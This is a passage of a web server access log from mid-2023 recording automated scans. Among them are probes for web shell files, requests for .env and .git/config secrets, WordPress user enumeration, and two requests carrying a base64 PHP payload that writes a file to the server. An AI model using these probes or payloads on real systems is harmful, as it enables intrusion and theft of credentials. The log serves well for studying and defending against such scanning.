Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:10 +0700] "GET /wp-admin/js/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:18 +0700] "GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:27 +0700] "GET /wp-content/plugins/seoo/wsoyanz1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:35 +0700] "GET /cache-compat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:43 +0700] "GET /ajax-actions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:52 +0700] "GET /wp-admin/ajax-actions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:00 +0700] "GET /wp-consar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:08 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:17 +0700] "GET /admin-post.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:25 +0700] "GET /wp-admin/maint/maint/ajax-actions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:33 +0700] "GET /wp-admin/dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:41 +0700] "GET /wp-admin/css/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:50 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:56:59 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:57:08 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:57:16 +0700] "GET /about.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:57:29 +0700] "GET /adminfuns.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:57:37 +0700] "GET /ebs.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:57:47 +0700] "GET /ws.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:57:55 +0700] "GET /alfanew2.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 165.227.47.103 - - [28/Jul/2023:01:15:41 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.87.9.220 - - [28/Jul/2023:04:17:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 198.235.24.65 - - [28/Jul/2023:06:06:25 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.87.9.77 - - [28/Jul/2023:18:17:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.30 - - [29/Jul/2023:09:12:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 205.210.31.143 - - [29/Jul/2023:15:29:34 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 45.87.9.94 - - [30/Jul/2023:02:08:53 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.92 - - [30/Jul/2023:20:14:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 147.78.47.249 - - [31/Jul/2023:09:21:53 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [31/Jul/2023:09:21:56 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [31/Jul/2023:09:21:59 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [31/Jul/2023:09:22:03 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [31/Jul/2023:09:22:06 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 18.231.186.116 - - [31/Jul/2023:13:16:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.92 - - [01/Aug/2023:06:17:23 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.175 - - [02/Aug/2023:00:12:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 183.136.225.44 - - [02/Aug/2023:03:29:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.44 - - [02/Aug/2023:03:41:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.44 - - [02/Aug/2023:03:42:12 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.44 - - [02/Aug/2023:03:42:49 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 147.78.103.182 - - [02/Aug/2023:14:14:07 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 147.78.103.182 - - [02/Aug/2023:14:14:07 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 205.210.31.28 - - [02/Aug/2023:14:26:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.87.9.175 - - [02/Aug/2023:19:06:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.111 - - [03/Aug/2023:13:09:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 212.227.82.37 - - [04/Aug/2023:06:51:20 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 212.227.82.37 - - [04/Aug/2023:06:51:23 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 212.227.82.37 - - [04/Aug/2023:06:51:32 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.87.9.126 - - [04/Aug/2023:08:12:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 198.235.24.83 - - [04/Aug/2023:14:00:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 188.166.149.47 - - [04/Aug/2023:14:05:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.87.9.188 - - [05/Aug/2023:02:13:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 147.78.103.182 - - [05/Aug/2023:11:13:11 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 15.229.118.184 - - [05/Aug/2023:20:09:40 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.143 - - [06/Aug/2023:14:09:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.92.1.90 - - [06/Aug/2023:14:26:38 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 205.210.31.17 - - [06/Aug/2023:15:53:44 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 34.247.13.55 - - [06/Aug/2023:17:51:44 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 162.144.37.46 - - [07/Aug/2023:03:33:54 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.144.37.46 - - [07/Aug/2023:03:33:57 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.144.37.46 - - [07/Aug/2023:03:34:00 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.87.9.252 - - [07/Aug/2023:11:14:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 35.212.222.235 - - [07/Aug/2023:14:10:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 45.87.9.156 - - [08/Aug/2023:10:15:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 147.78.47.249 - - [08/Aug/2023:14:29:11 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [08/Aug/2023:14:29:14 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [08/Aug/2023:14:29:19 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [08/Aug/2023:14:29:22 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [08/Aug/2023:14:29:25 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 167.248.133.185 - - [08/Aug/2023:22:35:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 5.189.130.31 - - [09/Aug/2023:07:34:19 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.189.130.31 - - [09/Aug/2023:07:34:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.189.130.31 - - [09/Aug/2023:07:34:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.87.9.60 - - [09/Aug/2023:11:17:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 205.210.31.140 - - [09/Aug/2023:14:02:26 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 202.125.82.183 - - [09/Aug/2023:20:10:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 202.125.82.183 - - [10/Aug/2023:07:53:25 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 45.87.9.254 - - [10/Aug/2023:13:08:54 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.141 - - [11/Aug/2023:12:19:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.135.57.93 - - [11/Aug/2023:17:01:24 +0700] "GET /.git/HEAD HTTP/1.1" 301 162 "-" "RepoLookoutBot/v1.1.0-260-g718bf6a (abuse reports to abuse@repo-lookout.org)" 45.87.9.62 - - [12/Aug/2023:11:10:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 205.210.31.142 - - [12/Aug/2023:18:22:32 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 45.87.9.45 - - [13/Aug/2023:09:19:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.87.9.77 - - [14/Aug/2023:13:10:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 15.228.149.230 - - [14/Aug/2023:13:11:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 194.146.26.240 - - [15/Aug/2023:05:32:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 147.78.47.249 - - [16/Aug/2023:11:02:01 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [16/Aug/2023:11:02:04 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [16/Aug/2023:11:02:07 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 65.154.226.167 - - [16/Aug/2023:11:26:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/115.0.5790.170 Safari/537.36" 45.81.39.201 - - [17/Aug/2023:04:40:56 +0700] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3lrZmp3LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 139.59.20.111 - - [18/Aug/2023:05:50:52 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 139.59.20.111 - - [18/Aug/2023:05:50:57 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 139.59.20.111 - - [18/Aug/2023:05:51:00 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 167.71.226.4 - - [18/Aug/2023:16:37:14 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 198.235.24.11 - - [21/Aug/2023:05:21:10 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 87.236.176.40 - - [23/Aug/2023:11:21:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 207.244.255.190 - - [25/Aug/2023:10:05:39 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 207.244.255.190 - - [25/Aug/2023:10:05:43 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 207.244.255.190 - - [25/Aug/2023:10:05:46 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.81.39.201 - - [27/Aug/2023:09:18:05 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [28/Aug/2023:04:22:27 +0700] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2ZiaWZjLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 167.94.146.59 - - [29/Aug/2023:07:55:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 142.93.133.94 - - [01/Sep/2023:16:38:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 144.91.106.14 - - [03/Sep/2023:05:53:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 205.210.31.33 - - [04/Sep/2023:13:16:47 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 167.94.145.57 - - [04/Sep/2023:13:42:56 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 63.32.110.63 - - [04/Sep/2023:19:51:58 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 103.30.212.11 - - [05/Sep/2023:07:08:38 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.30.212.11 - - [05/Sep/2023:07:08:41 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.30.212.11 - - [05/Sep/2023:07:08:44 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.81.39.201 - - [06/Sep/2023:18:38:10 +0700] "GET 